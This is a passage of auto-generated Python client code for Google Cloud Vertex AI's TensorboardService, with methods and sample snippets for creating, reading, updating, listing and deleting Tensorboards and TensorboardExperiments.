scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
always_use_jwt_access=True,
api_audience=client_options.api_audience,
)
def create_tensorboard(
self,
request: Optional[
Union[tensorboard_service.CreateTensorboardRequest, dict]
] = None,
*,
parent: Optional[str] = None,
tensorboard: Optional[gca_tensorboard.Tensorboard] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gac_operation.Operation:
r"""Creates a Tensorboard.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_create_tensorboard():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
tensorboard = aiplatform_v1.Tensorboard()
tensorboard.display_name = "display_name_value"
request = aiplatform_v1.CreateTensorboardRequest(
parent="parent_value",
tensorboard=tensorboard,
)
# Make the request
operation = client.create_tensorboard(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.CreateTensorboardRequest, dict]):
The request object. Request message for
[TensorboardService.CreateTensorboard][google.cloud.aiplatform.v1.TensorboardService.CreateTensorboard].
parent (str):
Required. The resource name of the Location to create
the Tensorboard in. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
tensorboard (google.cloud.aiplatform_v1.types.Tensorboard):
Required. The Tensorboard to create.
This corresponds to the ``tensorboard`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1.types.Tensorboard` Tensorboard is a physical database that stores users' training metrics.
A default Tensorboard is provided in each region of a
Google Cloud project. If needed users can also create
extra Tensorboards in their projects.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, tensorboard])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.CreateTensorboardRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.CreateTensorboardRequest):
request = tensorboard_service.CreateTensorboardRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if tensorboard is not None:
request.tensorboard = tensorboard
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_tensorboard]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = gac_operation.from_gapic(
response,
self._transport.operations_client,
gca_tensorboard.Tensorboard,
metadata_type=tensorboard_service.CreateTensorboardOperationMetadata,
)
# Done; return the response.
return response
def get_tensorboard(
self,
request: Optional[
Union[tensorboard_service.GetTensorboardRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard.Tensorboard:
r"""Gets a Tensorboard.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_get_tensorboard():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.GetTensorboardRequest(
name="name_value",
)
# Make the request
response = client.get_tensorboard(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.GetTensorboardRequest, dict]):
The request object. Request message for
[TensorboardService.GetTensorboard][google.cloud.aiplatform.v1.TensorboardService.GetTensorboard].
name (str):
Required. The name of the Tensorboard resource. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.Tensorboard:
Tensorboard is a physical database
that stores users' training metrics. A
default Tensorboard is provided in each
region of a Google Cloud project. If
needed users can also create extra
Tensorboards in their projects.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.GetTensorboardRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.GetTensorboardRequest):
request = tensorboard_service.GetTensorboardRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_tensorboard]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def update_tensorboard(
self,
request: Optional[
Union[tensorboard_service.UpdateTensorboardRequest, dict]
] = None,
*,
tensorboard: Optional[gca_tensorboard.Tensorboard] = None,
update_mask: Optional[field_mask_pb2.FieldMask] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gac_operation.Operation:
r"""Updates a Tensorboard.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_update_tensorboard():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
tensorboard = aiplatform_v1.Tensorboard()
tensorboard.display_name = "display_name_value"
request = aiplatform_v1.UpdateTensorboardRequest(
tensorboard=tensorboard,
)
# Make the request
operation = client.update_tensorboard(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.UpdateTensorboardRequest, dict]):
The request object. Request message for
[TensorboardService.UpdateTensorboard][google.cloud.aiplatform.v1.TensorboardService.UpdateTensorboard].
tensorboard (google.cloud.aiplatform_v1.types.Tensorboard):
Required. The Tensorboard's ``name`` field is used to
identify the Tensorboard to be updated. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``
This corresponds to the ``tensorboard`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. Field mask is used to specify the fields to be
overwritten in the Tensorboard resource by the update.
The fields specified in the update_mask are relative to
the resource, not the full request. A field is
overwritten if it's in the mask. If the user does not
provide a mask then all fields are overwritten if new
values are specified.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1.types.Tensorboard` Tensorboard is a physical database that stores users' training metrics.
A default Tensorboard is provided in each region of a
Google Cloud project. If needed users can also create
extra Tensorboards in their projects.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.UpdateTensorboardRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.UpdateTensorboardRequest):
request = tensorboard_service.UpdateTensorboardRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard is not None:
request.tensorboard = tensorboard
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_tensorboard]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard.name", request.tensorboard.name),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = gac_operation.from_gapic(
response,
self._transport.operations_client,
gca_tensorboard.Tensorboard,
metadata_type=tensorboard_service.UpdateTensorboardOperationMetadata,
)
# Done; return the response.
return response
def list_tensorboards(
self,
request: Optional[
Union[tensorboard_service.ListTensorboardsRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListTensorboardsPager:
r"""Lists Tensorboards in a Location.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_list_tensorboards():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ListTensorboardsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_tensorboards(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ListTensorboardsRequest, dict]):
The request object. Request message for
[TensorboardService.ListTensorboards][google.cloud.aiplatform.v1.TensorboardService.ListTensorboards].
parent (str):
Required. The resource name of the Location to list
Tensorboards. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.services.tensorboard_service.pagers.ListTensorboardsPager:
Response message for
[TensorboardService.ListTensorboards][google.cloud.aiplatform.v1.TensorboardService.ListTensorboards].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ListTensorboardsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.ListTensorboardsRequest):
request = tensorboard_service.ListTensorboardsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_tensorboards]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListTensorboardsPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def delete_tensorboard(
self,
request: Optional[
Union[tensorboard_service.DeleteTensorboardRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gac_operation.Operation:
r"""Deletes a Tensorboard.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_delete_tensorboard():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.DeleteTensorboardRequest(
name="name_value",
)
# Make the request
operation = client.delete_tensorboard(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.DeleteTensorboardRequest, dict]):
The request object. Request message for
[TensorboardService.DeleteTensorboard][google.cloud.aiplatform.v1.TensorboardService.DeleteTensorboard].
name (str):
Required. The name of the Tensorboard to be deleted.
Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.DeleteTensorboardRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.DeleteTensorboardRequest):
request = tensorboard_service.DeleteTensorboardRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_tensorboard]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = gac_operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
def read_tensorboard_usage(
self,
request: Optional[
Union[tensorboard_service.ReadTensorboardUsageRequest, dict]
] = None,
*,
tensorboard: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.ReadTensorboardUsageResponse:
r"""Returns a list of monthly active users for a given
TensorBoard instance.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_read_tensorboard_usage():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ReadTensorboardUsageRequest(
tensorboard="tensorboard_value",
)
# Make the request
response = client.read_tensorboard_usage(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ReadTensorboardUsageRequest, dict]):
The request object. Request message for
[TensorboardService.ReadTensorboardUsage][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardUsage].
tensorboard (str):
Required. The name of the Tensorboard resource. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``
This corresponds to the ``tensorboard`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.ReadTensorboardUsageResponse:
Response message for
[TensorboardService.ReadTensorboardUsage][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardUsage].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ReadTensorboardUsageRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.ReadTensorboardUsageRequest):
request = tensorboard_service.ReadTensorboardUsageRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard is not None:
request.tensorboard = tensorboard
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.read_tensorboard_usage]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard", request.tensorboard),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def read_tensorboard_size(
self,
request: Optional[
Union[tensorboard_service.ReadTensorboardSizeRequest, dict]
] = None,
*,
tensorboard: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.ReadTensorboardSizeResponse:
r"""Returns the storage size for a given TensorBoard
instance.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_read_tensorboard_size():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ReadTensorboardSizeRequest(
tensorboard="tensorboard_value",
)
# Make the request
response = client.read_tensorboard_size(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ReadTensorboardSizeRequest, dict]):
The request object. Request message for
[TensorboardService.ReadTensorboardSize][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardSize].
tensorboard (str):
Required. The name of the Tensorboard resource. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``
This corresponds to the ``tensorboard`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.ReadTensorboardSizeResponse:
Response message for
[TensorboardService.ReadTensorboardSize][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardSize].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ReadTensorboardSizeRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.ReadTensorboardSizeRequest):
request = tensorboard_service.ReadTensorboardSizeRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard is not None:
request.tensorboard = tensorboard
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.read_tensorboard_size]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard", request.tensorboard),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def create_tensorboard_experiment(
self,
request: Optional[
Union[tensorboard_service.CreateTensorboardExperimentRequest, dict]
] = None,
*,
parent: Optional[str] = None,
tensorboard_experiment: Optional[
gca_tensorboard_experiment.TensorboardExperiment
] = None,
tensorboard_experiment_id: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_tensorboard_experiment.TensorboardExperiment:
r"""Creates a TensorboardExperiment.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_create_tensorboard_experiment():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.CreateTensorboardExperimentRequest(
parent="parent_value",
tensorboard_experiment_id="tensorboard_experiment_id_value",
)
# Make the request
response = client.create_tensorboard_experiment(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.CreateTensorboardExperimentRequest, dict]):
The request object. Request message for
[TensorboardService.CreateTensorboardExperiment][google.cloud.aiplatform.v1.TensorboardService.CreateTensorboardExperiment].
parent (str):
Required. The resource name of the Tensorboard to create
the TensorboardExperiment in. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
tensorboard_experiment (google.cloud.aiplatform_v1.types.TensorboardExperiment):
The TensorboardExperiment to create.
This corresponds to the ``tensorboard_experiment`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
tensorboard_experiment_id (str):
Required. The ID to use for the Tensorboard experiment,
which becomes the final component of the Tensorboard
experiment's resource name.
This value should be 1-128 characters, and valid
characters are /[a-z][0-9]-/.
This corresponds to the ``tensorboard_experiment_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardExperiment:
A TensorboardExperiment is a group of
TensorboardRuns, that are typically the
results of a training job run, in a
Tensorboard.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any(
[parent, tensorboard_experiment, tensorboard_experiment_id]
)
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.CreateTensorboardExperimentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.CreateTensorboardExperimentRequest
):
request = tensorboard_service.CreateTensorboardExperimentRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if tensorboard_experiment is not None:
request.tensorboard_experiment = tensorboard_experiment
if tensorboard_experiment_id is not None:
request.tensorboard_experiment_id = tensorboard_experiment_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.create_tensorboard_experiment
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def get_tensorboard_experiment(
self,
request: Optional[
Union[tensorboard_service.GetTensorboardExperimentRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_experiment.TensorboardExperiment:
r"""Gets a TensorboardExperiment.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_get_tensorboard_experiment():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.GetTensorboardExperimentRequest(
name="name_value",
)
# Make the request
response = client.get_tensorboard_experiment(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.GetTensorboardExperimentRequest, dict]):
The request object. Request message for
[TensorboardService.GetTensorboardExperiment][google.cloud.aiplatform.v1.TensorboardService.GetTensorboardExperiment].
name (str):
Required. The name of the TensorboardExperiment
resource. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardExperiment:
A TensorboardExperiment is a group of
TensorboardRuns, that are typically the
results of a training job run, in a
Tensorboard.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.GetTensorboardExperimentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.GetTensorboardExperimentRequest):
request = tensorboard_service.GetTensorboardExperimentRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.get_tensorboard_experiment
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def update_tensorboard_experiment(
self,
request: Optional[
Union[tensorboard_service.UpdateTensorboardExperimentRequest, dict]
] = None,
*,
tensorboard_experiment: Optional[
gca_tensorboard_experiment.TensorboardExperiment
] = None,
update_mask: Optional[field_mask_pb2.FieldMask] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_tensorboard_experiment.TensorboardExperiment:
r"""Updates a TensorboardExperiment.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_update_tensorboard_experiment():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.UpdateTensorboardExperimentRequest(
)
# Make the request
response = client.update_tensorboard_experiment(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.UpdateTensorboardExperimentRequest, dict]):
The request object. Request message for
[TensorboardService.UpdateTensorboardExperiment][google.cloud.aiplatform.v1.TensorboardService.UpdateTensorboardExperiment].
tensorboard_experiment (google.cloud.aiplatform_v1.types.TensorboardExperiment):
Required. The TensorboardExperiment's ``name`` field is
used to identify the TensorboardExperiment to be
updated. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
This corresponds to the ``tensorboard_experiment`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. Field mask is used to specify the fields to be
overwritten in the TensorboardExperiment resource by the
update. The fields specified in the update_mask are
relative to the resource, not the full request. A field
is overwritten if it's in the mask. If the user does not
provide a mask then all fields are overwritten if new
values are specified.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardExperiment:
